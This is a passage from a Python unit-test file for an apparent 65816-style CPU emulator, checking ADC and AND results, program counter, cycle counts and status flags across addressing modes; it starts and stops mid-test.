self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_ind_indexed_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_ind_indexed_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_ind_indexed_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_ind_indexed_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_ind_indexed_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_ind_indexed_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_ind_indexed_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page, Indirect
def test_adc_bcd_off_dp_ind_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_ind_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.p |= mpu.CARRY
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_dp_ind_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_ind_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_ind_overflow_cleared_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_ind_overflow_cleared_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_ind_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_ind_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_ind_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.a = 0x4000
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page Indexed, Indirect (Y)
def test_adc_bcd_off_indexed_ind_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_indexed_ind_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.y = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_indexed_ind_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_indexed_ind_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_indexed_ind_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.y = 0x03
# $0000 $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_indexed_ind_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0000, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_indexed_ind_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_indexed_ind_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
mpu.y = 0x03
# $0000 $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_indexed_ind_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Immediate
def test_adc_bcd_off_immediate_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0
# $0000 ADC #$0000
self._write(mpu.memory, 0x0000, (0x69, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_immediate_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.p |= mpu.CARRY
# $0000 ADC #$0000
self._write(mpu.memory, 0x0000, (0x69, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_immediate_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
# $0000 ADC #$FEFF
self._write(mpu.memory, 0x0000, (0x69, 0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_immediate_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
# $0000 ADC #$FFFF
self._write(mpu.memory, 0x0000, (0x69, 0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_immediate_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC #$01
self._write(mpu.memory, 0x000, (0x69, 0x01, 0X00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_immediate_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC #$FFFF
self._write(mpu.memory, 0x000, (0x69, 0xff, 0xff))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_immediate_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC #$01
self._write(mpu.memory, 0x000, (0x69, 0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_immediate_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC #$FFFF
self._write(mpu.memory, 0x000, (0x69, 0xff, 0xff))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_immediate_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.a = 0x4000
# $0000 ADC #$4000
self._write(mpu.memory, 0x0000, (0x69, 0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
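# The three overflow cases above (0x7FFF+0x0001, 0x8000+0xFFFF and
# 0x4000+0x4000) all follow the usual two's-complement rule: V is set
# when both operands have the same sign bit and the sum's sign bit
# differs. A minimal, non-normative sketch of that rule for the 16-bit
# accumulator width assumed by these tests (the helper name is
# illustrative only and is not part of the emulator's API):
def _adc_overflow_sketch(self, a, m, carry_in=0):
    """Return (result, v) for a 16-bit binary-mode ADC."""
    total = a + m + carry_in
    result = total & 0xFFFF
    # V: operands agree in sign bit 15, but the result disagrees.
    v = bool((~(a ^ m) & (a ^ result)) & 0x8000)
    return result, v
# e.g. _adc_overflow_sketch(0x4000, 0x4000) returns (0x8000, True).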
# AND Absolute
def test_and_absolute_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND $ABCD
self._write(mpu.memory, 0x0000, (0x2D, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_absolute_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND $ABCD
self._write(mpu.memory, 0x0000, (0x2D, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Absolute, X-Indexed
def test_and_abs_x_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND $ABCD,X
self._write(mpu.memory, 0x0000, (0x3d, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_abs_x_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND $ABCD,X
self._write(mpu.memory, 0x0000, (0x3d, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Absolute, Y-Indexed
def test_and_abs_y_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.y = 0x03
# $0000 AND $ABCD,Y
self._write(mpu.memory, 0x0000, (0x39, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_abs_y_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.y = 0x03
# $0000 AND $ABCD,Y
self._write(mpu.memory, 0x0000, (0x39, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page
def test_and_dp_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND $0010
self._write(mpu.memory, 0x0000, (0x25, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_dp_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND $0010
self._write(mpu.memory, 0x0000, (0x25, 0x10))
self._write(mpu.memory, 0x0010, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page, X-Indexed
def test_and_dp_x_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND $0010,X
self._write(mpu.memory, 0x0000, (0x35, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_dp_x_all_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND $0010,X
self._write(mpu.memory, 0x0000, (0x35, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page Indirect, Indexed (X)
def test_and_ind_indexed_x_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x21, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_ind_indexed_x_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x21, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page, Indirect
def test_and_dp_ind_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x32, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_dp_ind_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x32, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page Indexed, Indirect (Y)
def test_and_indexed_ind_y_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.y = 0x03
# $0000 AND ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x31, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_indexed_ind_y_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.y = 0x03
# $0000 AND ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x31, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
